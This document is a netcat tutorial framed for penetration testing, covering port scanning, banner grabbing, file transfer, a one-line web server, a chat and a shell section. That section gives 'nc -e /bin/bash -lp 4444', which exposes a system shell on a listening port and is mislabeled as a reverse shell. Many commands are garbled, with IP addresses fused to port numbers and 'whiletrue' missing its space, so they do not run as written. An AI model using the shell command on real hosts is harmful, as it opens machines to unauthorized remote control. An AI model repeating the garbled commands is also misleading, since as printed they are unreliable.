Useful Netcat Tricks

 
In this article I will review the popular netcat network utility and useful tricks when working with it.

Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transmit it. Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.

Using this utility, you can perform some steps during the penetration testing. This can be useful when the installed machine does not have (or attract attention) installed packages, there are restrictions (for example, IoT / Embedded devices), etc.

What can be done with netcat:

• Scan ports
• Port forwarding;
• Collect service banners;
• Listen port (bind for reverse connection);
• Download and upload files;
• Display raw HTTP content;
• Create a mini chat.

In general, using netcat, you can replace part of the unix utilities, so this tool can be considered a kind of combine for performing certain tasks.

Practical examples

In many cases, if it is necessary to verify a particular host, they use telnet, or their own service departments to identify the host or banner. How netcat can help us:

Check for open TCP port 12345

$ nc -vn 192.168.1.10012345

nc: connect to 192.168.1.100 12345 (tcp) failed: Connection refused

$ nc -v 192.168.1.10022

Connection to 192.168.1.100 22 port [tcp / ssh] succeeded!
SSH-2.0-OpenSSH

Scan TCP ports using netcat:

$ nc -vnz 192.168.1.10020-24

With this scan, there will be no connection to the port, but only the output of a successful connection:

nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
found 0 associations
found 1 connections:
1: flags = 82 <CONNECTED, PREFERRED>
outif en0
src 192.168.1.100 port 50168
dst 192.168.1.100 port 22
rank info not available
TCP aux info available
Connection to 192.168.1.100 port 22 [tcp / *] succeeded!
nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 24 (tcp) failed: Connection refused

Scan UDP ports.

Root privileges are required to scan UDP ports using nmap. If there are none, then the netcat utility can also help us:

$ nc -vnzu 192.168.1.1005550-5560

Connection to 192.168.1.100 port 5555 [udp / *] succeeded!

Sending UDP packet

$ echo -n "foo" | nc -u -w1 192.168.1.100 161

This can be useful when interacting with network devices.

Receiving data on a UDP port and outputting received data

$ nc -u localhost 7777

After the first message, the output will be stopped. If you need to accept several messages, then you need to use while true:

$ whiletrue; do nc -u localhost 7777; done

File transfer. Using netcat, you can either receive files or transfer them to a remote host:

nc 192.168.1.100 5555 < 1.txt

nc -lvp 5555 > /tmp/1.txt

Netcact as the simplest web server.

Netcat can serve as the simplest web server for displaying html pages.

$ whiletrue; do nc -lp 8888 < index.html; done

Using a browser at: http: // netcat host : 8888 / index.html. To use the standard port of the web server at number 80, you will have to run nc with root privileges:

$ whiletrue; do sudo nc -lp 80 < test.html; done

Chat between sites

On the first node (192.168.1.100):

$ nc -lp 9000

On the second node:

$ nc 192.168.1.1009000

After executing the commands, all characters entered in the terminal window on any of the nodes will appear in the terminal window of another node.

Reverse shell

Using netcat, you can organize a convenient reverse shell:

nc -e /bin/bash -lp 4444

Now you can connect to the remote host:

$ nc 192.168.1.1004444

Do not give up, if there are no particular tools, often quite bulky, sometimes the problem can be solved by improvised means.